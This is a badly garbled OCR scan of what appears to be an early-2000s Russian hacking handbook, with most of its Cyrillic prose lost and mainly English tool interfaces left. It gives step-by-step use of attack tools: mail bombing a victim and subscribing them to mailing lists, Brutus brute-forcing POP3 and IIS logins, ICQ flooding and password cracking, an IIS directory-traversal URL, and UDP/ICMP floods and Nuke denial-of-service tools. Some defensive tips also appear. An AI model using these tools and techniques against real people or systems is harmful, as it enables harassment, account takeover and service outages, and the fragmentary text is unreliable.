jendjombjl | Edil Headers | | Abort | | Clear | | Clone | fy

i-Size of BombI B Randomly Change [ ,Usages to send: -m I Edit Server list JI 1 I O Never ending bomb

20.01.2003.

use the Edit He

Puc. 6.1. DnD DnD, , 1-1. , ( ). . .84

DnD Settings (), DnD (. . 6.1). DnD Settings () : > SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net. > Spoof Host ( ) , . , . Randomly Change ( ) , SMTP-. > SMTP-, Edit Server List ( ). Random Server List ( ), . 6.2. Random Servei List ôrca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net stjohns.edu ] Imalasada.lava. | lpressentef.com | |cyberhighway.n| |widQwmaker.co| Iclubmet.mettob | j jcabletegina.co | J |maple.nis.net |

mail.sisna.com| | why.net

wwa.com J |nyx1G.cs.du.ed| | clinet.fi soi.hypeichalcl rdagobert.rz.uni-jl lspace.net tka.com ihZOOO.nel | Iplix.conr

Idubmet.metrob | ltMvl.net | vitro, com

Puc. 6.2. SMTP-

SMTP- Random Server List ( ) . Submit (). Size of Bomb ( ) (. 6.1) : # of messages to send ( ) . 10. Never ending bomb ( ) .

85

Check the box and then fill in the information that will appear in the headers under that category; or uncheck the box to remove it from the headers. X-Mailer: X-URL: X-Sender: X-Date: | | | |

Q Return Path: [ Q References: | Priority: I

Q X-Authenlication Warning | Generate IP | |124.49.153.SO | [TedGilsdorf Clear Cancel

Ok

Puc. 6.5. MIME

13 , DnD , . , , . , Clone () E-Mail bomb ( ) Bomber Spawn 1 ( ), . 6.6.-a Bomber Spawn 1 Sendbombto: Say bomb is from: Message Subject:

-1

l|

1

Randomly Change | | Random

Message Body:

1SMTP Server: gl Randomly Change

ya

l l l I Edit Headers | | Abort | Clear l nl m| |[Status {Messages Sent! |0

j?I |

Puc. 6.6. 88

, Bomber Spawn 1 ( ) E-Mail bomb ( ) - SMTP-. , SMTP-. - - , ! - . , , ( - ). > , DnD Clones Load Multi Clones ( * ). Number of clones ( ), . 6.7Number of clones How many clones do you want to load?

L

J

Puc. 6.7. - ! > Number of clones ( ) ( 5-6) . Bomber Spawn ( ), 1 - . Send Bomb ( ) . - !

&& ! , - , 89

! DnD , , Mailing lists ( ). Subscribe joe lamer to mailing list ( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine ( ) - !*i Subscribe joe lamei to a mailing list!

1=1

Subscribe your enemy to a mailing list even worse then a mailbomb! More lists coming next version..sorry lor the small quantity (his lime. My apologies for the bad usability but I will use checkboxes instead of option boxes next version.. Jewish List CMd Parenting Targets email address: Targets fits! name: Targets last name: Lesbians over 40 Family Medecine [ |j0hn |

Digital Queers Gay Quakers Mormons Gay/Lesbian Euro Queer Christianity womanism people

Bi Australians Allergies

Puc. 6.8. DnD DnD . Target Email Address ( ), Subscribe em () - . , .

, , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9. , How many characters? ( ?) ( - 8 ) : Use Both ( ) - , Use numbers ( ) - 90

Use letters ( ) - . - , , .* Randomic Passwoid Geneialor

Jusl click to generate a random password. Choose how long you want it to be by the number ol characters. How many characters? [12 | Use Both 6i2i9e1m5p8i Use numbers Use letters

Extras () - . 6.9. SMTP- ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools ( ) . - , , . , - ; . , , . , ( ). , .

Close

Clear box

. , , - ( IMAP) , . - . Brutus Authentication Engine Test 2 ( Brutas , 2), Brutus AET2 (http://www.hobie.net/brutus). . 6.10 Brutus, , FTP, HTTP, Telnet NetBus.91

1

I Biulus AET2 - www.hoobie.net/biutu: - (January 2000)lie Tools Help | Ti"pe|POP3 | | | Start ~

(SisJE I| Stop [Clear

1

Target

|127.0.0.1

Port (110 | Connections 10 Timeout ^} 10 Use Proxy | Drf |

| ' S. ^P9?l D Try to stay connected for [Unlimite || attempts B? .? . . . . .| ^

.

.

. Single Usef | | Browse | Pass Mode [Word List " | p pass pje jwords.txt | | Browse |

0 Use Username User File | users.txt

Positive Authentication Results Target I Type I Username I Password I

5J II II

|

)

R*cl

AuthSeq

Throttle Quick Ki

ll>dle

Puc. 6.10. Brutus

*

, Brutus ( 8 Brutus IIS). , alex-1 .sword.net, kolia. , , - , . . > Brutus - 2 (. 6.10) Target () , alex-1.sword.net. > () , . > Connection Options ( ) Use Proxy ( ), - . > Authentication Options ( ) Single User ( ) - .

92

User file ( ) , .. - kolia. > Pass Mode ( ) Brute Force ( ). Brutus , . 6.11.X Biutus - 2 - www.hoobie.net/biuluit - (January 2000J File Tool. Help Type|POP3 [ | | Start | Slop | Clear | T

Target

|alex-1.sword.net

P

nnection Optioru >orl [110 | Connections I 10 Timeout I 10 Use Proxy I Define!

IPS Options Try to slay connected for |Untmil8 |-r | attempts

| Modify sequence | -Authentication Options 0 UseUsemame UserlD | kolia

0 Single User

Pass Mode [Brute Force|--1 |[Kange|| | Dfellfcuted |

Positive Authentication Results Target I Type I Username | Password |

Rtet

AuthStq

Throttle Quick Kil

Puc. 6.11. Brutus POPS Range (). Range () Brutus - Brute Force Generation (Brutus - ), . 6.12.Biutus - Biule Foice Generation Digits only Lowercase Alpha Uppercase Alpha Mixed Alpha Alphanumeric Full Keyspace Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! | Min Length [ Max Length [4 [T Cancel

Puc. 6.12.

93

Brutus - Brute Force Generation (Brutus - ) - , , . , - , Min Length ( ) 3, Max Length ( ) - 4. , Digits only ( ). . > Start () Brutus - 2 Brutus - 2. . 6.13.X Uiutus - 2 - www.hoobie.net/biutus - [Januaiy 2000J File Took Help Type|POP3 EJ | Start | Stop | Clear |

1=1

Target | alex-1.sword.net i-Connection Option*I

Port [110

|

Connections

10 Timeout

10

rPOlP3 Options-

I?

| Modify sequence |

D Try to stay connected for |Unlimite | > | attempts

-Authentication Options El Use Username UserlD [kolia 0 Single User Pass Mode [Brute Force [ I Range DisllbAed

Positive Authentication Results Target alex-1.sword.net I Type POP3 | Username kolia I Password 0007 I

Positive authentication at alex-1 .sword.net with User : kolia Password : 0007 (1 0997 attempts

Timeout10997 Uikolia P:0000 ~]|37 Attempts per second

Reject|Idle

Throttle

Quick

Puc. 6.13. 1. Positive Authentication Results ( ) , kolia - 0007. , Brutus 10997 alex-1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /. , , Brutus (

94

). -, , , ( 8 !), , (, &$ ..). ! Brutus - Brute Force Generation (Brutus - ) 8 , Full Keyspace ( ). Start () Brutus - 2 - 6 095 689 385 410 816 - , ! 12 ? , , , (., , [10]). Brutus, Pass Mode ( ). ( 100 000), , . , password, parol, MyPassword - Web- - . -, , , Ethernet, 30-50 / ( ). - . - , - , , , . . , , , , , . . - , .

95

IIS Brutus 8 , - . , , . , , , - , - ! : !. .

, , , . 1, , , , . - , , , , . , - ( - ), . , - , . . , TFTP 1-1 , 1-1 . , TFTP , . TFTP , , , . , , , , , . . , ,96

( ) . , , , Web- - .. ( , ). . - , , , -. . - , .. , - , , . , .. , - - . , 2002 ., , , . Web-. . . ... ( ). Web-, , ?, . , , ?, ?, ? . - , , , , . , , , , , . , , - , , repa_parenaia, - !

- . , , , , . 974 - 5830

- , , , - , . . , - . , . , ( ) , - ! . , 8 ( 12) , , . , DnD . . , - , Norton Antivirus MacAfee VirusScan. , - PGP Desktop Security. , . , - , , , . - - , .

98

7.

ICQ ICQ Intelligent Call Query, . ICQ [--] : I Seek You - ; , ICQ . ICQ , 1998 Mirabilis, ( 40 ) AOL. ICQ , ICQ , , . , , ICQ, , . , , - . ICQ , ICQ. ICQ , ICQ, , http://www.ICQ.com, http://mira-bilis.com. ICQ - ICQ , , 1998,1999, 2000, 2002, ICQ 2003. ICQ UDP, 4000, - TCP, . , ICQ, UIN (Unique Identification Number - ). UTN - ICQ , . , ICQ? ICQ , . , ? .

-, ICQ, . -, ICQ ICQ . , ICQ, : , UIN , , . , ICQ , - ICQ . , , - . ICQ-, , IP- ICQ-, , . , , DoS, 9 . , IP- ICQ, - , ICQ- . ! , ICQ-, . , , , - , . ICQ, Mirabilis . ICQ, ICQ , . , .

100

ICQ

ICQ . - , ICQ ICQ ICQ. , ICQ ; , ICQ- (, LameToy www.mirabilis.com). , ( ) , . , , , , , . , ICQ. . . Sword-2000 ICQ Groupware Server, Alex- ICQ Groupware Client, UESf, 1001, 1-1 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQ Groupware, , , 1. - , ICQ - , ICQ . ICQ ICQ-, ICQ-, ICQ- .

101

UIN ICQ- UIN ICQ, , UIN . UIN . , , - . - - , . , , . ( ) LameToy for ICQ (DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , . LameToy for ICQ. . 7.1 , LameToy for ICQ.LameToy For Icq [DBKILLER] | Send [ Losei-

1[Normal Message M

Slop | | Update; | Menu | | Hide [f Exit Selling-

LLMZ.

JQ044J-UlNSniffer-

I

Pott Scarmei- |Sendei miNBIiOOl

1.

I Get Local IP 11501

[

IPasswdL Messsage

l|URL|hHp:/V

Puc. 7.1. LameToy for ICQ (DBKILLER) ICQ LameToy for ICQ (DBKILLER) - Send (). , Setting () Loop () , . UIN, UIN# - Ran (Random - 102

ICQ ). , , , , . , ICQ-, - , UIN UIN . , ICQ (ICQ99a ICQ99b) . DB- ( - ), DB Data Base - , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ, . , , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker .

lf~ac)peca ICQ- DoS ( ) , - . , , , Advanced ICQ IP Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sniffer.Advanced ICQ IP SnifferYour UIN: [207685174 | Password: IJ Clear list Timeout. Tiy again. Saver

a a a'

UIN to check: |123456783 Cheek

Ext IP: |Status: |

|

IntIP: |

|

TCP Pott: | 0

|TCPFIa9: |

| TCP Version: |0

Puc. 7.2. - IP- ICQ

103

IP- ICQ UIN, Advanced ICQ IP Sniffer ICQ, UIN . , , Your UIN ( UIN) Password () Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ UTN , Info () . , Info () . 7.2 , ( ) IP- ICQ, TCP-, ICQ . , , Ext IP ( ), Int IP ( IP) TCP Port ( TCP). , ICQ- ( ). ICQ, Advanced IP ICQ Sniffer, ICQ server's address and port ( ICQ), Server () . 7.3.ICQ server's address and portAddress: licq.rnirdbilis.com Port: [4000 |

3||

| ||

OKCancel

ICQ server's address and port ( ICQ) Mirabilis ICQ 4000. , / IP- / .

. 7.. ICQ server's address and port ( ICQ)

ICQ, , , ICQ-, ICQ- ICQ. , , . , ICQ, ICQ-MultiWar (http://www.paybackproductions.com/), - ICQ Flooder (. 7.4).

104

ICQICQ Flooder FileVictim's address: 127.0.0.1 El Randomly generated UIN Appatenl source UIN: Q No. ol Messages: |1 Message: Eat this! [ | ICQ Port [1027

ICO Flooder 1.2 Copyright (C) 1998 dph-man and Implant Man

Puc. 7.4. ICQ ICQ Flooder, . > Victim's address ( ) IP- ICQ. > ICQ-port ( ICQ) TCP. > , UIN . : UTN - Randomly generated UIN ( UIN), UIN UIN. UIN - Apparent source UIN ( UIN ) UIN, ICQ . > No. of Messages ( ) ICQ-. > Message () (- , ). > Send! () . - , ICQ, , - , , 105

http://mht.hut.ru/icq/icq.html, ( , , ICQ , ). ICQ - , , , - !

ICQ ICQ, ICQ, , . , , . , , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 7.5.OICO SubMachineGun vl.4 by uD File Settings About [ Bruteforce ] [... [ 13 Single [~~] Single About Agent Force!

| ( ) uD . Moscow 2QO1 |c

Puc. 7.5. ICQ subMachineGun U1N ICQ

106

ICQ brute force - , , . . ICQ ICQ subMachineGun . > ICQ subMachineGun. > Settings * Connections&Cracking (&). , . 7.6.icq server [ Cracking ] 13 Stop if successful... Make log of cracked uins 0 Reconnect if timeout 0 Cut passwds length to 8 digits set timeout: relogln ; times port

Cancel

OK

Puc. 7.6. U1N icq server ( ICQ) ICQ, , ICQLmirabilis.server. port () 4000. Cracking () : Stop if successful ( ) ICQ. Make log if cracked uins ( UIN) ICQ.107

Reconnect if timeout ( ) ICQ . Cut password length to 8 digits ( 8- ) 8- . > set timeout ( ) 15 . > relogin ( ) ICQ 3. ICQ subMachineGun UIN . . > ICQ subMachineGun Bruteforce ( ) UIN. . Single () UIN, . Single () UIN. UIN, (...) Making victims list ( ), . 7.7. Making victims list ( ) Range () , , UIN ( - 100000) ( 900900).

I Hint: use Del to remove uins from list

Puc. 7.7. UIN

step () UIN ( - 100). Generate () UIN; .

108

ICQ , Generate () - UIN, , , .. Add () UIN . > UIN, Open () UIN ( UIN ). > - UIN , t0*"!. Clear () UIN ( ). UIN, . . > ICQ subMachineGun Bruteforce ( ) . . Single () , . Single () . > , (...) Make passlist ( ), . 7.8. Make passlist ( ) . > Open () ( ). - , ICQ.

Use Del to remove passwords from list

Puc. 7.8.

v Generator () Add (). , .109

> , 0 *"**]. Clear () ( ). > , . . Force (). , ICQ subMachineGun v1.4 (. 7.9).OICQ SubMachineGun vl 4 by uD File Settings About

[ Bruteforce ] [] 0 Single [~~] D Single

About Agent

Puc. 7.9. - ICQ subMachineGun v1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. - 45 , ( ). , , , , , .. - . ...110

ICQ

( -, , ICQ - . ICQ , ICQ . , ? - ! , ? , ICQ- , . , . ? , Windows. , . , ICQ , ICQ. ICQ-, , ElcomSoft Advanced ICQ Password Recovery (http://www.elcomsoft.com). , . . 7.10 Advanced ICQ Password Recovery.

31.01.2003 2:05 - ACQPR1.0 launched, registered version

6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L

Puc. 7.10. ICQ .dat ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.111

, , ICQ 2002 2002. 2002 , UIN .dat, .., , 207685174.dat (207685174 - UIN ). ICQ Password successfully found! ( ICQ ), (. 7.11).ICQ Password successfully found ! ICQ version: 99b-2000b UIN password:

% Copy to Clipboard

fij Close

Puc. 7.11. !

. 7.11, ICQ 99b - 2000b, ICQ 2002 ( ). , ICQ , - , - ICQ-. - , , (. [11]), Web- (. 8). , , , .

, ICQ ( ) , . , , , ICQ. , , ICQ - , - . , . ICQ, . . , , ICQ- - ICQ . , ICQ , UIN . - 112

ICQ ? , , , - , . , , - , , , , , , - . ICQ - , , , , , , , , . - , .. ICQ, , , . , ICQ ICQ, ICQ ( , ICQ Team (http://www.lcqteam.com)). ICQ- ICQ, ICQ- - ICQ. - , . , ? , , . , - , ? , ... , , , . ICQ-, - , .

ICQ , . ICQ - ,

113

ICQ-. ICQ DoS ... . ICQ . -, , ICQ-, ICQ-, ICQ- . ICQ, ICQ. IP- , , ICQ. ICQ . , ICQ-, UTN . , ICQ-, -, , BlacklCE Defender, DoS. - , , . , . , ICQ - . -, - ICQ, ICQ. , IP- ICQ-, - . , . , . ICQ , PGP Desktop Security 2.9, ICQ- . , PGP- ( [7]).

114

8.

Web-caumoft Web? , Web , . Web- , Web- . , , , . , Web- , , , , . HTML Web- ( - ), , . HTML . ( ). , Web-, , Web-, , . HTTP, , , . Web-, , . , Web-, DoS , , Yahoo. , Web-, , ( ) Web- , . Web , .

Web~cauma Web Web , , Web, Web,

, . -

Web - Web, Web . Web - , Web, Web . Web , . Web - Web, , Internet Explorer (ffi), - HTML Web-, HTTP, Web. Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation . Web, ASP (Active Server Page - ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle . , , , - ODBC (Open Data Base Connectivity - ). - , , , , , ... ?

1 Web~cauma , Web-, . , .

116

Web- Web- - , , , , , Web . Web- - Web- , , TCP- 80, , Web-, ( CVE, Web-), Web- - . Web - - ASP, Java, CGI - , . Web - , -, , -, ( !). , , - . , , (cookie), , . - Web- , , . , , CGI- , - CGI- , , , . - , Web- , . - , Web- , , , - . - , , , Web-, Web-, . , (, . []). , , , , IIS 5. , 117

( HTTP), CGI- ( ) Web ( Web). Web- , . IIS , Web-, . , Web- , - , . - , Web-. - . , FTP- , , . , . Web- .

Web~cauma , Web-, . , , , , . , , . , Web- , - , , DNS-, . Web. , .

118

Web-

cbp Web- . . -, , - , . IP-, , , . Whols . -, HTML- Web- . HTML , Web, , . , , , , JavaScript . , HTML- Web Web- Teleport Pro. , , Whols - , , Web. whois ( Unix), Web- , whois Web-.

Whols . , , . 1999 - Network Solution (http://www.networksolution.com), , , InterNic (http://www.internic.net). / . Web-, Whois ( ), . Whois , ,

119

, DNS . , RIPE NCC (Network Coordinate Center - ), IP- . Web- RIPE NCC (http://www.ripe.net), . 8.1.t @ T 1 Aqp9c|fehltp://www.ripB.net/npen^ûb^^c^^ El ^ |

. 8.1. Web- RIPE NCC IP- Web- ? - - DNS - .

, SuperScan (http://www.foundstone.com), . 8.2. SuperScan, . > Start () - . > Stop () . > Scan type ( ) All list ports from ( ). > Start ().

120

Web-

Timeout StarlfTMT Stop|l.0.0.5P'ng |400

|

Resolve hoslnames 121 Only scan responsive pings [3 Show host responses Ping only Every port in lisl All selected ports in list (5 All list poets from All ports from

5 EZB

Conned |2000 | 0 Ignore IP zero 0 Ignore IP 255 Extract from He Read 14000 I

. 8.2. SuperScan . , IP- 1.0.0.1 HTTP IIS 5.0, - Web. ( ), .

6 shares found on 1 remote hosts.

w a-

1.0.0,1My Documents NETLOGON D Tesl My Downloads SYSVOL

M.0.0.1SMy Documents M.O.(mNETLOGON M.0.0.1\D M.0.0.1\Tesl . Downloads M.0.0.1\SYSVOL

Map Drive

. 8.. IIS 5121

Legion (http://packetstormsecurity.org/ groups/rhinoS), - 1.0.0.1 . 8.3. , - IIS 5, - , ? .

II5 | IIS , HTTP (Hypertext Transfer Protocol - ) CGI (Common Gateway Interface - ), IIS, . HTTP , , [12], - Web . HTTP , GET. Web- (, ), GET, , , http://www.anyserver.com/documents/order.html. order.html /documents IIS, c:\inetpub\wwwroot\documents. CGI , , [12], . HTTP, : http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2 MyScript - , /scripts IIS, a ?1+2 , MyScript. IIS , , , . CGI, ASP (Active Server Pages - ) ISAPI (Internet Server Programming Interface - ). ASP : http://www.anysite.com/scripts/MyScripts7napaMeTp1 =1&2= 2

122

Web- MyScript.asp, , , HTML. ISAPI , ISAPI. HTTP: http://www.anysite.com/isapi.111?1&2 , IIS, , .

HTTP , IIS . IIS 2.0 :

http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web- , secret.txt. - Windows, ACL. IIS , Web- [3]. IIS , , , , , SecurityLab.ru (http://www.securitylab.ru). IIS, netcat (http://www.atstake.com), (netcat - - [3] netcat IIS). netcat Sword-2000 , . netcat . > Alex- netcat, nc -vv 1.0.0.1 80. v GET / HTTP/ 1.0 111. . 8.4. GET / HTTP/1.0 IIS. . 8.4, HTML, .

123

ic-MCommand Piompl c:\test\netcat>nc -vv 1.0.0.1 80 GET / HTTP /1.0

nisnatch: SUORD-20UO != | DNS fud/reutl.0.0.1] 80 open SUORD-2000

suord-2000.suoi-d.net

HTTP/1.1 400 Bad Request

Seruer: M i c r o s o f t - I I S / S . 0 Date: Fri, 28 Feb 2003 12:55:40 GHI Content-Type: t e x t / h t n l Content-Length: 87 itml>ErrorThe parameter sent 17, rcud 224: NOISOCK C:\test4netcat>

Puc. 8.4. GET IIS netcat , GET Start () Brutus - 2 (. 8.20) . Brutus - 2 . 8.22.

140

Web-^ ^ 1 X Brutus - AET2 - www.hoobie.net/brulu: - (January 2000) ^^ 1File Tool Help I Type I HTTP (Basic Auth] | | | Start Stop | Clear

Target | . 0.0.1 1 . I 1 Port 1 30 Connections ^ '

10 Timeout

10

Use Proxy [ Define |

Method

(HEAD

P I

0 KeepAlive

0 Use Username U sell D [Administrator

0 Single Usei |Biw*|

Pass Mode [Brute Force pj | Range 1 1 OfeWbutw) |

Fife

lwrdi.txt

|||

Positive Authentication Results Target 1.0.0.1/ 1 Type 1 Username HTTP (Basic Auth) Administrator 1 Password 007 1

992

^* ** ** ^ ^.||U:Adrniriistrator P:000 | 5 Attempts per second |8 |l l |de

Positive authentication at 1 .0.0.1/ with User : Administrator Password : 007 (992 attempts) Disengaged target 1.0.0.1 elapsed time : 0:00:17 attempts : 992

/f

Puc. 8.22. IIS ! , IIS , . 8.23, , .

Puc. 8.23. Web , Brutus , Web. CGI- Web-. () HTTP (Form) (HTTP ()) GET ,

141

, , , .

Web, , - . Web , . , , . , Windows NT/95/98, Web- CGI Vulnerability Scan D@MNED CGI Scanner 2.1, , , Web, , . , Web-, , , . Web - , Web- . , Web- - , Retina, , , [7]. Web- - , .

142

9.

UoS , TCP/IP, TCP/IP , . , , - , DoS (Denial of Service ). DoS -, TCP/IP . DoS , . DoS , , Yahoo, eBay, CNN.com, www.Microsoft.com, , [3]. , - , , , . DoS , , , , . , [3], DoS , . , , , , DoS Web-; , DoS . , , - , DoS. , DoS , . DoS , , , , - - IDS (, BlacklCE Defender (http://blackice.iss.net/)), .

DoS, , .

' DoS , . , , DoS . - , , , ( Web- Yahoo). . , , 1 ( 1544 /), , , 56 / ( ). - , , , . . - , . - , , . - , . , . - , , . . DoS , , .

144

DoS

, . 1, Web- [3], , . , , . , . , - UDP ICMP. DoS, , , /. .

, UDP UDP, . , DoS, UDP Flooder 2.0 Foundstone (http://www.foundstone.com), , - , . . 9.1 UDP Flooder 2.O. UDP Flooder 2.0, DoS 1-3 IP- 1.0.0.5 . > UDP Flooder 2.O. IP/hostname (IP/ ) IP- NetBIOS - IP- 1.0.0.5. > Port () , 80, HTTP-.

145

UDP Flondfir 2 IP: 1.0.0.1

^ __. 11011 .|II

1Port [30 |

IP/hostname |1. 0.0.5

Max duration (sees) Speed (pkts/sec)

Înfinite] |

Max packets [[Infinite]

|

min

max[[ -

| 250 |

.

~"V

Modem > Cable > Tl > LAN

Random Text

[20000 | to [30000 | bytes |"' UDFFlocH! Server eH'iste

||| Go

From file | Brows 1 1

Packets sent Seconds elapsed

903 20.299

|

Stop

Puc. 9.1. UDP Speed () LAN, . Data () Random ( ), - FileWindows Task Manager Opliont View Help Applications | Processes J Performance | Nettviîng [ . Sword > , , 20 000 30 000, . > Go (). > , , Stop (). . 9.2 Alex- , Networking ().146Adapter Name I Network Utilization I Link Speed I 10 Mbps

Operatic

[[Processes: 39

||CPU Usage: 22%

[[Commit Charge: 150620K / 47864 J

Puc. 9.2. 80%

DoS , - UDP, 50% . - , LAN Ethernet I DBase.

4>) ICMP ( ) ICMP (Internet Control Message Protocol - ) UDP. . 9.3 X-Script ICMP Bomber.pt ICMP Bomber vO 3 By Code Host |1.0.0.5 Packet Size: h ooOOO \ NumberToSenchhooo

Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs Received 34464 bytes from 1.0.0.5 in 60 msecs

. 9.. X-Script ICMP Bomber , , Host () IP- , Ping (). , Packet Size ( ) , Number to Send ( ) . - . . 9.4 , Alex- ( IP- , , 1.0.0.5). ICMP , ICMP (Internet Control Message Protocol - ) TCP/IP, ICMP . ICMP , Web-; ICMP .

147

" Windows Task Managei File Options View Help

Applications I Processes I Performance I Networking

Processes: 38

||CPU Usage: 5%

\\Commb Charge: 1417 / 47864 ^

Puc. 9.4. DoS !

Aht3K3 Smurf , , , DoS ? Smurf, . , , Smurf . ECHO () ICMP, . IP- , . , , - 10 , . , DoS, DDoS (Distributed DoS). DDoS -, . , ,

148

DoS DoS . DDoS WinTrinoo ( http://www.bindview.com), , , DDoS Win32. 2000 DDoS , Web- (, , , WinTrinoo). - Foundstone , , DoS.

DoS, , , , , . , , DoS, , . , . DoS PortFuck, ( TCP- , ). PortFuck - TCP- , . , , , TCP- , , , . . 9.5 PortFuck.! f PortFuck 1.02 PRIVATE BUILD .: Host: localhost Port: ] | START

Reconnect on Disconnect Delay (MS): | 000 1 [Ready. |

|

Help?P A

NICI |

Socks: [5

Puc. 9.5. PortFuck 149

Nuke Nuke , DoS, , , -, . - , . TCP/IP ICMP, ICMP . - - , .. - ICMP, , , . , . - - , , , , . Web-, , . Nuke - . DoS Nuke , , Windows 2000/XP , Windows 9x. Windows 2000/XP, (, [4]). , Windows 9x, , . , . Nuke - , . , Windows Nuke'eM version 1.1, . 9.8. Nuke , - Alex-2, IP- 1.0.0.4 Windows 95. . > Address () Windows Nuke'eM version 1.1, . 9.8, IP- Alex-2 (Windows 95), Alex-3 (Windows XP) Alex-1 (Windows 2000). - Add () .152

DoS

Address [1.0,0,7 1.0.0.4 1.0.0.5 1.0.0.7 lext [Testing 1 2 3 JDelay ft

\"\ Eort [

[ ^ dose after execulio -

This program is created by Sadikuz (c) for test-purposes only. The author of this program is not responsible for any misbehaviour by | Add | |Remove! | HelpI

Execute Dong

Puc. 9.8. > Execute (). Windows Nuke'eM version 1.1 (. 9.9).Windows Nuke'eM - Version 1 . 1Rle

Help

MEot|l39 ]I

Address |1. 0.0.7 1.0.0.4 {Nuked} 1.0.0.5 {Connect error} 1.0.0.7 {Connect error} lexl |Testing 1 2 3 Delay |o

| Q Close after execution ^

This program is created by Sadikuz (c) for test-purposes only. The author of this program is not responsible for any misbehaviour by ||

Add

| | Remove | |

Help

| 1 Execute

I

I

Unable to connect to: 1 .0.0.7

Puc. 9.9. Alex-2 ! > Alex-2, 1-2 Windows. Windows , . 9.10. , 1-2 - Nuke. , IRC- IP-. Windows , , , IDS ( BlacklCE Defender).

153

- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable: Datagram Too Big ( : ). , ICMP DoS , , , , , , . , , DoS, TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP- NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send. , nbname - , nbname, , nbname.

DoS - , . , , , . , [11] , , DoS, , , Web- . , Web-. - , DoS. DDoS - , , , , ,

156

DoS -. , Foundstone. , , .. , 1 , Foundstone . DDoS, , Foundstone . Foundstone, (Robin Keir), http://www.foundstone.com DDoSPing 2.0, -. , UDP, UDP . . 9.11 DDosPing 2.0, .-Target IP address range Start IP address End IP address |1.Q.Q.5| h.OO 5 -Transmission speed controlSpeed (pkts/sec)I 181 I

Slop

Modem>-Cable>T1 >LAN -Infected Hosts-

-o-

Program started: Sun Febl613:50:48 2003 Waiting 6 seconds for final results... Program stopped: Sun Feb1613:50:54 2003

- Status Current IP Packets sent Time elapsed Zombies detected ne /,

1.0.0.5

3 00:00:00 0Affp://i

Save List Configuration

. 9.11. DDoS DDoSPing 2.0 . > Start IP address ( IP-) End IP-address ( -) IP- .157

> Speed () , , LAN. > , Configuration () . 9.12).

Enable Send to UDP port "Ping" command Expected reply

|

Windows defaults |

UNIX defaults |

[34555

Listen on UDP port |3555

|pngQ..KsH4 (PONG

I iP^ceivelCMPID [69 |

0 Enable SendlCMPID "Ping" commend Expected reply [668 Jgesundheit! |sicken\n |

I IReceive ICMP ID [ |

0 Enable SendlCMPID "Ping" command [?89 |

~ """" Show UDP transmit errors Max run duration (sees) Transmit each packet After scon ends, wait [O 1 I (Qforev@r) times sees for final rep lies Cancel

i

I

| OK'

. 9.12. > , Windows defaults (Windows ) Unix defaults (Unix ), Windows Unix, . > , DDoSPing 2.0 , WinTrinoo, , - StachelDraht Tribe Flood Network. , (. 9.12). > DDoSPing 2.0 . 9.11 Start () . Infected Hosts ( ). , - Zombie Zapper (http://razor.bindview.com/tools/ ZombieZapper__form.shtml), WinTrinoo. . 9.13 , , , DDoSPing 2.O.158

DoS

Target(s) Target IP: | input IMs...

0 Specify single IP or class subnet

|

0 Trinoo 0TFN 0 Sta.chelDroht

UDP source

|53

0 Trinoo for Windows

QShatt-myfloodedhost: [ T o I Repeats (1-300)

|

Zap

Exit

Puc. 9.13. Zombie Zapper DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.

, , , DoS - , , 1 . , , - , , - Web- - . - , , , , , . DoS , - (-, , ) Web-. IP- ICMP-! EDS DP-, , , , Web. , - , . DoS , - - !159

10.

Windows ZOOO/Xf, , - () , , - , ( , , [1]). , , , - - . , . ? TCP/IP, . TCP/IP . . 1 , . - , , [11]. , , , . 1, , - .

cemu*TCf/lf IP- , ping , W2RK (Windows 2000 Resource Pack). - ICMP (Internet Control Message Protocol - ). . . 10.1 ping Sword-2000.

Windows 2000/XP \ Command Prompt

Pinging 1.Q.O.I with 32 bytes of data: Reply Reply Reply Reply fron fron fron fron 1.0.0.1: 1.0.0.1: 1.0.0.1: 1.0.0.1: bytes=32 bytes=32 bytes=32 bytes=32 tinenbtst

Sviord: Node Ipflddress: 11..0.5] Scope Id: I I NetBIOS Remote Machine Nane Table

SUORD-20QQ SUORD-2Q00 SUORD SUORD SUORD SUORD SWORD-20QGI SUORD MSBROUSE_ INef"Seruices IS-SUORD-2000. flDMINISlllfllOR 52-54-flB-14-S5-B4

Registered Registered Registered Registered Registered Registered Registere Registerei Registered Registered

Puc. 10.4. Sword-2000 , Administrator Sword-2000 CD-ROM. , - NetBIOS, Administrator, 7, 9, 13, 17, 139, 443, 1025, 1027 , :. Administrator - : .

164

Windows 2000/XP , pwdump3.exe Windows NT/2000/XP LC4 . , NetBIOS TCP/IP ( Windows 2000/XP )? , , SNMP (Simple Network Management Protocol - ), Windows NT/2000/XP. , SNMP, , , [11]. , , , .

Windows NT/2000/XP . , . , , , . - , ..

